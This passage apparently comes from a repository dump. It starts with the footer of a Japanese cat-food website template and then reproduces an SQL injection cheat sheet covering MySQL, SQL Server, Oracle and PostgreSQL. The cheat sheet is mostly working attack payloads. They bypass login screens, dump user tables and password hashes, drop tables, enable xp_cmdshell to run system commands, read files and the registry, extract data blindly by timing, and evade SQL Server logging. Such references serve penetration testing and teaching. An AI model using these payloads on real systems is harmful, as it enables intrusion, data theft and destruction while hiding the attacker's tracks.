306 | <li id="menu-item-2492" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2492"><a href="/catfood-dogfood/">ドッグフードを猫に与えると？</a></li>
307 | <li id="menu-item-2785" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2785"><a href="/cat-food-save/">キャットフードの保存方法</a></li>
308 | <li id="menu-item-2848" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2848"><a href="/catfood/">避けるべき原材料一覧</a></li>
309 | <li id="menu-item-2849" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2849"><a href="/senior-cat-food-not-eat/">老猫へのご飯の与え方</a></li>
310 | </ul></div></div>
311 | <div class="footer_widget clearfix widget_nav_menu" id="nav_menu-15">
312 | <h3 class="footer_headline">猫の病気について</h3>
313 | <div class="menu-%e3%82%b5%e3%82%a4%e3%83%89%e3%83%90%e3%83%bc%e3%82%ab%e3%82%b9%e3%82%bf%e3%83%a0%e3%83%a1%e3%83%8b%e3%83%a5%e3%83%bc%e3%80%8c%e7%97%85%e6%b0%97%e3%80%8d-container"><ul id="menu-%e3%82%b5%e3%82%a4%e3%83%89%e3%83%90%e3%83%bc%e3%82%ab%e3%82%b9%e3%82%bf%e3%83%a0%e3%83%a1%e3%83%8b%e3%83%a5%e3%83%bc%e3%80%8c%e7%97%85%e6%b0%97%e3%80%8d" class="menu"><li id="menu-item-2119" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2119"><a href="/cat-food-safety/">もう迷わない！安全なキャットフードの選び方&#038;人気猫餌ランキング</a></li>
314 | <li id="menu-item-2120" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2120"><a href="/cat-flutd/">猫の下部尿路疾患とは？</a></li>
315 | <li id="menu-item-2121" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2121"><a href="/cat-bad-breath/">猫の口が臭い原因</a></li>
316 | <li id="menu-item-2122" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2122"><a href="/cat-pee/">猫のおしっこが出なくなる理由</a></li>
317 | <li id="menu-item-2123" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2123"><a href="/cat-cystitis/">猫ちゃんも膀胱炎になる？</a></li>
318 | <li id="menu-item-2124" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2124"><a href="/cat-kidney-disease/">猫の腎臓病について</a></li>
319 | <li id="menu-item-2125" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2125"><a href="/cat-spit/">猫が吐いてしまう時は？</a></li>
320 | <li id="menu-item-2126" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2126"><a href="/cat-uremia/">猫の尿毒症って？</a></li>
321 | </ul></div>
322 | <div>#links1#</div>
323 | <div>#content#</div></div>
324 | 										</div>
325 | 		</div>
326 | 	</div>
327 | 	<div id="copyright">Copyright &copy;&nbsp; <a href="/">キャットフードの選び方・子猫の育て方をまとめるサイト | ネコぱんち！</a> All Rights Reserved.</div>
328 | 	<!-- /footer -->
329 | </div>
330 | <!-- AdSense Manager v4.0.3 (0.365 seconds.) -->	<div style="display:none">
331 | 	</div>
332 | 
333 | 
334 | 
335 | 
336 | 
337 | 
338 | 
339 | 
340 | 
341 | 
342 | 
343 | 
344 | 
345 | 
346 | 
347 | 
348 | </body>
349 | </html>
350 | </div>


--------------------------------------------------------------------------------
/sql-injection-cheatsheet:
--------------------------------------------------------------------------------
  1 | About the SQL Injection Cheat Sheet
  2 | 
  3 | This SQL injection cheat sheet was originally published in 2007 by Ferruh Mavituna on his blog.  
  4 | Currently this SQL Cheat Sheet only contains information for MySQL, Microsoft SQL Server, and some limited information for ORACLE and PostgreSQL SQL servers. Some of the samples in this sheet might not work in every situation because real live environments may vary depending on the usage of parenthesis, different code bases and unexpected, strange and complex SQL sentences. 
  5 | 
  6 | Samples are provided to allow you to get basic idea of a potential attack and almost every section includes a brief information about itself.
  7 | 
  8 | M :	MySQL
  9 | S :	SQL Server
 10 | P :	PostgreSQL
 11 | O :	Oracle
 12 | + :	Possibly all other databases
 13 | 
 14 | Examples;
 15 | (MS) means : MySQL and SQL Server etc.
 16 | (M*S) means : Only in some versions of MySQL or special conditions see related note and SQL Server
 17 | 
 18 | ---
 19 | 
 20 | Table Of Contents
 21 | 
 22 | Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
 23 | Line Comments
 24 | SQL Injection Attack Samples
 25 | Inline Comments
 26 | Classical Inline Comment SQL Injection Attack Samples
 27 | MySQL Version Detection Sample Attacks
 28 | Stacking Queries
 29 | Language / Database Stacked Query Support Table
 30 | About MySQL and PHP
 31 | Stacked SQL Injection Attack Samples
 32 | If Statements
 33 | MySQL If Statement
 34 | SQL Server If Statement
 35 | If Statement SQL Injection Attack Samples
 36 | Using Integers
 37 | String Operations
 38 | String Concatenation
 39 | Strings without Quotes
 40 | Hex based SQL Injection Samples
 41 | String Modification & Related
 42 | Union Injections
 43 | UNION – Fixing Language Issues
 44 | Bypassing Login Screens
 45 | Enabling xp_cmdshell in SQL Server 2005
 46 | Finding Database Structure in SQL Server
 47 | Fast way to extract data from Error Based SQL Injections in SQL Server
 48 | Blind SQL Injections
 49 | Covering Your Tracks
 50 | Extra MySQL Notes
 51 | Second Order SQL Injections
 52 | Out of Band (OOB) Channel Attacks
 53 | Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
 54 | 
 55 | ---
 56 | 
 57 | Ending / Commenting Out / Line Comments
 58 | 
 59 | Line Comments
 60 | 
 61 | Comments out rest of the query. 
 62 | Line comments are generally useful for ignoring rest of the query so you don't have to deal with fixing the syntax.
 63 | 
 64 | -- (SM) 
 65 | DROP sampletable;-- 
 66 | # (M) 
 67 | DROP sampletable;#
 68 | Line Comments Sample SQL Injection Attacks
 69 | 
 70 | Username: admin'--
 71 | SELECT * FROM members WHERE username = 'admin'--' AND password = 'password' 
 72 | This is going to log you as admin user, because rest of the SQL query will be ignored.
 73 | Inline Comments
 74 | 
 75 | Comments out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.
 76 | 
 77 | /*Comment Here*/ (SM)
 78 | DROP/*comment*/sampletable
 79 | DR/**/OP/*bypass blacklisting*/sampletable
 80 | SELECT/*avoid-spaces*/password/**/FROM/**/Members
 81 | /*! MYSQL Special SQL */ (M) 
 82 | This is a special comment syntax for MySQL. It's perfect for detecting MySQL version. If you put a code into this comments it's going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version. 
 83 | 
 84 | SELECT /*!32302 1/0, */ 1 FROM tablename
 85 | Classical Inline Comment SQL Injection Attack Samples
 86 | 
 87 | ID: 10; DROP TABLE members /* 
 88 | Simply get rid of other stuff at the end the of query. Same as 10; DROP TABLE members --
 89 | SELECT /*!32302 1/0, */ 1 FROM tablename 
 90 | Will throw an divison by 0 error if MySQL version is higher than3.23.02
 91 | MySQL Version Detection Sample Attacks
 92 | 
 93 | ID: /*!32302 10*/
 94 | ID: 10 
 95 | You will get the same response if MySQL version is higher than 3.23.02
 96 | SELECT /*!32302 1/0, */ 1 FROM tablename 
 97 | Will throw a division by 0 error if MySQL version is higher than3.23.02
 98 | Stacking Queries
 99 | 
100 | Executing more than one query in one transaction. This is very useful in every injection point, especially in SQL Server back ended applications.
101 | 
102 | ; (S) 
103 | SELECT * FROM members; DROP members--
104 | Ends a query and starts a new one.
105 | 
106 | Language / Database Stacked Query Support Table
107 | 
108 | green: supported, dark gray: not supported, light gray: unknown
109 | 
110 | SQL Injection Cheat sheet 
111 | 
112 | About MySQL and PHP; 
113 | To clarify some issues; 
114 | PHP - MySQL doesn't support stacked queries, Java doesn't support stacked queries (I'm sure for ORACLE, not quite sure about other databases). Normally MySQL supports stacked queries but because of database layer in most of the configurations it's not possible to execute a second query in PHP-MySQL applications or maybe MySQL client supports this, not quite sure. Can someone clarify?
115 | 
116 | Stacked SQL Injection Attack Samples
117 | 
118 | ID: 10;DROP members --
119 | SELECT * FROM products WHERE id = 10; DROP members--
120 | This will run DROP members SQL sentence after normal SQL Query.
121 | 
122 | If Statements
123 | 
124 | Get response based on an if statement. This is one of the key points of Blind SQL Injection, also can be very useful to test simple stuff blindly and accurately.
125 | 
126 | MySQL If Statement
127 | 
128 | IF(condition,true-part,false-part) (M) 
129 | SELECT IF(1=1,'true','false')
130 | SQL Server If Statement
131 | 
132 | IF condition true-part ELSE false-part (S) 
133 | IF (1=1) SELECT 'true' ELSE SELECT 'false'
134 | Oracle If Statement
135 | 
136 | BEGIN
137 | IF condition THEN true-part; ELSE false-part; END IF; END; (O) 
138 | IF (1=1) THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END;
139 | PostgreSQL If Statement
140 | 
141 | SELECT CASE WHEN condition THEN true-part ELSE false-part END; (P) 
142 | SELECT CASE WEHEN (1=1) THEN 'A' ELSE 'B'END;
143 | If Statement SQL Injection Attack Samples
144 | 
145 | if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S) 
146 | This will throw an divide by zero error if current logged user is not "sa" or "dbo".
147 | 
148 | Using Integers
149 | 
150 | Very useful for bypassing, magic_quotes() and similar filters, or even WAFs.
151 | 
152 | 0xHEXNUMBER (SM) 
153 | You can  write hex like these; 
154 | 
155 | SELECT CHAR(0x66) (S) 
156 | SELECT 0x5045 (this is not an integer it will be a string from Hex) (M) 
157 | SELECT 0x50 + 0x45 (this is integer now!) (M)
158 | String  Operations
159 | 
160 | String related operations. These can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.
161 | 
162 | String Concatenation
163 | 
164 | + (S) 
165 | SELECT login + '-' + password FROM members
166 | || (*MO) 
167 | SELECT login || '-' || password FROM members
168 | *About MySQL "||"; 
169 | If MySQL is running in ANSI mode it's going to work but otherwise MySQL accept it as `logical operator` it'll return 0. A better way to do it is using CONCAT()function in MySQL.
170 | 
171 | CONCAT(str1, str2, str3, ...) (M) 
172 | Concatenate supplied strings. 
173 | SELECT CONCAT(login, password) FROM members
174 | Strings without Quotes
175 | 
176 | These are some direct ways to using strings but it's always possible to use CHAR()(MS) and CONCAT()(M) to generate string without quotes.
177 | 
178 | 0x457578 (M) - Hex Representation of string 
179 | SELECT 0x457578 
180 | This will be selected as string in MySQL. 
181 | 
182 | In MySQL easy way to generate hex representations of strings use this; 
183 | SELECT CONCAT('0x',HEX('c:\\boot.ini'))
184 | Using CONCAT() in MySQL 
185 | SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (M) 
186 | This will return 'KLM'.
187 | SELECT CHAR(75)+CHAR(76)+CHAR(77) (S) 
188 | This will return 'KLM'.
189 | SELECT CHR(75)||CHR(76)||CHR(77) (O) 
190 | This will return 'KLM'.
191 | SELECT (CHaR(75)||CHaR(76)||CHaR(77)) (P) 
192 | This will return 'KLM'.
193 | Hex based SQL Injection Samples
194 | 
195 | SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M) 
196 | This will show the content of c:\boot.ini
197 | String Modification & Related
198 | 
199 | ASCII() (SMP) 
200 | Returns ASCII character value of leftmost character. A must have function for Blind SQL Injections. 
201 | 
202 | SELECT ASCII('a')
203 | CHAR() (SM) 
204 | Convert an integer of ASCII. 
205 | 
206 | SELECT CHAR(64)
207 | Union Injections
208 | 
209 | With union you do SQL queries cross-table. Basically you can poison query to return records from another table.
210 | 
211 | SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members 
212 | This will combine results from both news table and members table and return all of them.
213 | 
214 | Another Example: 
215 | ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
216 | 
217 | UNION – Fixing Language Issues
218 | 
219 | While exploiting Union injections sometimes you get errors because of different language settings (table settings, field settings, combined table / db settings etc.) these functions are quite useful to fix this problem. It's rare but if you dealing with Japanese, Russian, Turkish etc. applications then you will see it.
220 | 
221 | SQL Server (S) 
222 | Use field COLLATE SQL_Latin1_General_Cp1254_CS_AS or some other valid one - check out SQL Server documentation. 
223 | 
224 | SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members
225 | MySQL (M) 
226 | Hex() for every possible issue
227 | Bypassing Login Screens (SMO+)
228 | 
229 | SQL Injection 101, Login tricks
230 | 
231 | admin' --
232 | admin' #
233 | admin'/*
234 | ' or 1=1--
235 | ' or 1=1#
236 | ' or 1=1/*
237 | ') or '1'='1--
238 | ') or ('1'='1--
239 | ....
240 | Login as different user (SM*) 
241 | ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
242 | *Old versions of MySQL doesn't support union queries
243 | 
244 | Bypassing second MD5 hash check login screens
245 | 
246 | If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database.
247 | 
248 | Bypassing MD5 Hash Check Example (MSP)
249 | 
250 | Username :admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
251 | Password : 1234
252 | 
253 | 81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
254 | 
255 |  
256 | 
257 | Error Based - Find Columns Names
258 | 
259 | Finding Column Names with HAVING BY - Error Based (S)
260 | 
261 | In the same order,
262 | 
263 | ' HAVING 1=1 --
264 | ' GROUP BY table.columnfromerror1 HAVING 1=1 --
265 | ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
266 | ' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- and so on
267 | If you are not getting any more error then it's done.
268 | Finding how many columns in SELECT query by ORDER BY (MSO+)
269 | 
270 | Finding column number by ORDER BY can speed up the UNION SQL Injection process.
271 | 
272 | ORDER BY 1--
273 | ORDER BY 2--
274 | ORDER BY N-- so on
275 | Keep going until get an error. Error means you found the number of selected columns.
276 | Data types, UNION, etc.
277 | 
278 | Hints,
279 | 
280 | Always use UNION with ALL because of image similar non-distinct field types. By default union tries to get records with distinct.
281 | To get rid of unrequired records from left table use -1 or any not exist record search in the beginning of query (if injection is in WHERE). This can be critical if you are only getting one result at a time.
282 | Use NULL in UNION injections for most data type instead of trying to guess string, date, integer etc.
283 | Be careful in Blind situtaions may you can understand error is coming from DB or application itself. Because languages like ASP.NET generally throws errors while trying to use NULL values (because normally developers are not expecting to see NULL in a username field)
284 | Finding Column Type
285 | 
286 | ' union select sum(columntofind) from users-- (S) 
287 | Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 
288 | [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument. 
289 | 
290 | If you are not getting an error it means column is numeric.
291 | Also you can use CAST() or CONVERT()
292 | SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--
293 | 11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –- 
294 | No Error - Syntax is right. MS SQL Server Used. Proceeding.
295 | 11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –- 
296 | No Error – First column is an integer.
297 | 11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 -- 
298 | Error! – Second column is not an integer.
299 | 11223344) UNION SELECT 1,'2',NULL,NULL WHERE 1=2 –- 
300 | No Error – Second column is a string.
301 | 11223344) UNION SELECT 1,'2',3,NULL WHERE 1=2 –- 
302 | Error! – Third column is not an integer. ... 
303 | 
304 | Microsoft OLE DB Provider for SQL Server error '80040e07' 
305 | Explicit conversion from data type int to image is not allowed.
306 | You'll get convert() errors before union target errors ! So start with convert() then union
307 | 
308 | Simple Insert (MSO+)
309 | 
310 | '; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*
311 | 
312 | Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes
313 | 
314 | @@version (MS) 
315 | Version of database and more details for SQL Server. It's a constant. You can just select it like any other column, you don't need to supply table name. Also, you can use insert, update statements or in functions.
316 | 
317 | INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)
318 | 
319 | Bulk Insert (S)
320 | 
321 | Insert a file content to a table. If you don't know internal path of web application you can read IIS (IIS 6 only) metabase file(%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify application path.
322 | 
323 | Create table foo( line varchar(8000) )
324 | bulk insert foo from 'c:\inetpub\wwwroot\login.asp'
325 | Drop temp table, and repeat for another file.
326 | BCP (S)
327 | 
328 | Write text file. Login Credentials are required to use this function. 
329 | bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
330 | 
331 | VBS, WSH in SQL Server (S)
332 | 
333 | You can use VBS, WSH scripting in SQL Server because of ActiveX support.
334 | 
335 | declare @o int 
336 | exec sp_oacreate 'wscript.shell', @o out 
337 | exec sp_oamethod @o, 'run', NULL, 'notepad.exe' 
338 | Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' -- 
339 | 
340 | Executing system commands, xp_cmdshell (S)
341 | 
342 | Well known trick, By default it's disabled in SQL Server 2005. You need to have admin access.
343 | 
344 | EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
345 | 
346 | Simple ping check (configure your firewall or sniffer to identify request before launch it),
347 | 
348 | EXEC master.dbo.xp_cmdshell 'ping '
349 | 
350 | You can not read results directly from error or union or something else.
351 | 
352 | Some Special Tables in SQL Server (S)
353 | 
354 | Error Messages 
355 | master..sysmessages
356 | Linked Servers 
357 | master..sysservers
358 | Password (2000 and 20005 both can be crackable, they use very similar hashing algorithm ) 
359 | SQL Server 2000: masters..sysxlogins 
360 | SQL Server 2005 : sys.sql_logins 
361 | More Stored Procedures for SQL Server (S)
362 | 
363 | Cmd Execute (xp_cmdshell) 
364 | exec master..xp_cmdshell 'dir'
365 | Registry Stuff (xp_regread) 
366 | xp_regaddmultistring
367 | xp_regdeletekey
368 | xp_regdeletevalue
369 | xp_regenumkeys
370 | xp_regenumvalues
371 | xp_regread
372 | xp_regremovemultistring
373 | xp_regwrite 
374 | exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares' 
375 | exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
376 | Managing Services (xp_servicecontrol)
377 | Medias (xp_availablemedia)
378 | ODBC Resources (xp_enumdsn)
379 | Login mode (xp_loginconfig)
380 | Creating Cab Files (xp_makecab)
381 | Domain Enumeration (xp_ntsec_enumdomains)
382 | Process Killing (need PID) (xp_terminate_process)
383 | Add new procedure (virtually you can execute whatever you want) 
384 | sp_addextendedproc 'xp_webserver', 'c:\temp\x.dll' 
385 | exec xp_webserver
386 | Write text file to a UNC or an internal path (sp_makewebtask)
387 | MSSQL Bulk Notes
388 | 
389 | SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/
390 | 
391 | DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0
392 | 
393 | HOST_NAME() 
394 | IS_MEMBER (Transact-SQL)  
395 | IS_SRVROLEMEMBER (Transact-SQL)  
396 | OPENDATASOURCE (Transact-SQL)
397 | 
398 | INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"
399 | OPENROWSET (Transact-SQL)  - http://msdn2.microsoft.com/en-us/library/ms190312.aspx
400 | 
401 | You can not use sub selects in SQL Server Insert queries.
402 | 
403 | SQL Injection in LIMIT (M) or ORDER (MSO)
404 | 
405 | SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;
406 | 
407 | If injection is in second limit you can comment it out or use in your union injection
408 | 
409 | Shutdown SQL Server (S)
410 | 
411 | When you're really pissed off, ';shutdown --
412 | 
413 | Enabling xp_cmdshell in SQL Server 2005
414 | 
415 | By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.
416 | 
417 | EXEC sp_configure 'show advanced options',1 
418 | RECONFIGURE
419 | 
420 | EXEC sp_configure 'xp_cmdshell',1 
421 | RECONFIGURE
422 | 
423 | Finding Database Structure in SQL Server (S)
424 | 
425 | Getting User defined Tables
426 | 
427 | SELECT name FROM sysobjects WHERE xtype = 'U'
428 | 
429 | Getting Column Names
430 | 
431 | SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
432 | 
433 | Moving records (S)
434 | 
435 | Modify WHERE and use NOT IN or NOT EXIST, 
436 | ... WHERE users NOT IN ('First User', 'Second User') 
437 | SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members) -- very good one
438 | Using Dirty Tricks 
439 | SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int 
440 | 
441 | Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21
442 |  
443 | 
444 | Fast way to extract data from Error Based SQL Injections in SQL Server (S)
445 | 
446 | ';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--
447 | 
448 | Detailed Article: Fast way to extract data from Error Based SQL Injections
449 | 
450 | Finding Database Structure in MySQL (M)
451 | 
452 | Getting User defined Tables
453 | 
454 | SELECT table_name FROM information_schema.tables WHERE table_schema = 'databasename'
455 | 
456 | Getting Column Names
457 | 
458 | SELECT table_name, column_name FROM information_schema.columns WHERE table_name = 'tablename'
459 | 
460 | Finding Database Structure in Oracle (O)
461 | 
462 | Getting User defined Tables
463 | 
464 | SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
465 | 
466 | Getting Column Names
467 | 
468 | SELECT * FROM all_col_comments WHERE TABLE_NAME = 'TABLE'
469 | 
470 | Blind SQL Injections
471 | 
472 | About Blind SQL Injections
473 | 
474 | In a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections.
475 | 
476 | Normal Blind, You can not see a response in the page, but you can still determine result of a query from response or HTTP status code 
477 | Totally Blind, You can not see any difference in the output in any kind. This can be an injection a logging function or similar. Not so common, though.
478 | 
479 | In normal blinds you can use if statements or abuse WHERE query in injection (generally easier), in totally blinds you need to use some waiting functions and analyze response times. For this you can use WAIT FOR DELAY '0:0:10' in SQL Server, BENCHMARK() and sleep(10) in MySQL, pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in ORACLE.
480 | 
481 | Real and a bit Complex Blind SQL Injection Attack Sample
482 | 
483 | This output taken from a real private Blind SQL Injection tool while exploiting SQL Server back ended application and enumerating table names. This requests done for first char of the first table name. SQL queries a bit more complex then requirement because of automation reasons. In we are trying to determine an ascii value of a char via binary search algorithm.
484 | 
485 | TRUE and FALSE flags mark queries returned true or false.
486 | 
487 | TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78-- 
488 | 
489 | FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103-- 
490 | 
491 | TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) 
492 | FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89-- 
493 | 
494 | TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) 
495 | FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83-- 
496 | 
497 | TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) 
498 | FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80-- 
499 | 
500 | FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)
501 | 
502 | Since both of the last 2 queries failed we clearly know table name's first char's ascii value is 80 which means first char is `P`. This is the way to exploit Blind SQL injections by binary search algorithm. Other well-known way is reading data bit by bit. Both can be effective in different conditions.
503 | 
504 |  
505 | 
506 | Making Databases Wait / Sleep For Blind SQL Injection Attacks
507 | 
508 | First of all use this if it's really blind, otherwise just use 1/0 style errors to identify difference. Second, be careful while using times more than 20-30 seconds. database API connection or script can be timeout.
509 | 
510 | WAIT FOR DELAY 'time' (S)
511 | 
512 | This is just like sleep, wait for specified time. CPU safe way to make database wait.
513 | 
514 | WAITFOR DELAY '0:0:10'--
515 | 
516 | Also, you can use fractions like this,
517 | 
518 | WAITFOR DELAY '0:0:0.51'
519 | 
520 | Real World Samples
521 | 
522 | Are we 'sa' ? 
523 | if (select user) = 'sa' waitfor delay '0:0:10'
524 | ProductID = 1;waitfor delay '0:0:10'--
525 | ProductID =1);waitfor delay '0:0:10'--
526 | ProductID =1';waitfor delay '0:0:10'--
527 | ProductID =1');waitfor delay '0:0:10'--
528 | ProductID =1));waitfor delay '0:0:10'--
529 | ProductID =1'));waitfor delay '0:0:10'--
530 | BENCHMARK() (M)
531 | 
532 | Basically, we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!
533 | 
534 | BENCHMARK(howmanytimes, do this)
535 | 
536 | Real World Samples
537 | 
538 | Are we root ? woot! 
539 | IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))
540 | Check Table exist in MySQL 
541 | IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))
542 | pg_sleep(seconds) (P)
543 | 
544 | Sleep for supplied seconds.
545 | 
546 | SELECT pg_sleep(10); 
547 | Sleep 10 seconds.
548 | sleep(seconds) (M)
549 | 
550 | Sleep for supplied seconds.
551 | 
552 | SELECT sleep(10); 
553 | Sleep 10 seconds.
554 | dbms_pipe.receive_message (O)
555 | 
556 | Sleep for supplied seconds.
557 | 
558 | (SELECT CASE WHEN (NVL(ASCII(SUBSTR(({INJECTION}),1,1)),0) = 100) THEN dbms_pipe.receive_message(('xyz'),10) ELSE dbms_pipe.receive_message(('xyz'),1) END FROM dual)
559 | 
560 | {INJECTION} = You want to run the query.
561 | 
562 | If the condition is true, will response after 10 seconds. If is false, will be delayed for one second.
563 | 
564 | Covering Your Tracks
565 | 
566 | SQL Server -sp_password log bypass (S)
567 | 
568 | SQL Server don't log queries that includes sp_password for security reasons(!). So if you add --sp_password to your queries it will not be in SQL Server logs (of course still will be in web server logs, try to use POST if it's possible)
569 | 
570 | Clear SQL Injection Tests
571 | 
572 | These tests are simply good for blind sql injection and silent attacks.
573 | 
574 | product.asp?id=4 (SMO)
575 | product.asp?id=5-1
576 | product.asp?id=4 OR 1=1 
577 | 
578 | product.asp?name=Book
579 | product.asp?name=Bo'%2b'ok
580 | product.asp?name=Bo' || 'ok (OM)
581 | product.asp?name=Book' OR 'x'='x
582 | Extra MySQL Notes
583 | 
584 | Sub Queries are working only MySQL 4.1+
585 | Users
586 | SELECT User,Password FROM mysql.user;
587 | SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';
588 | SELECT ... INTO DUMPFILE
589 | Write query into a new file (can not modify existing files)
590 | UDF Function
591 | create function LockWorkStation returns integer soname 'user32';
592 | select LockWorkStation(); 
593 | create function ExitProcess returns integer soname 'kernel32';
594 | select exitprocess();
595 | SELECT USER();
596 | SELECT password,USER() FROM mysql.user;
597 | First byte of admin hash
598 | SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
599 | Read File
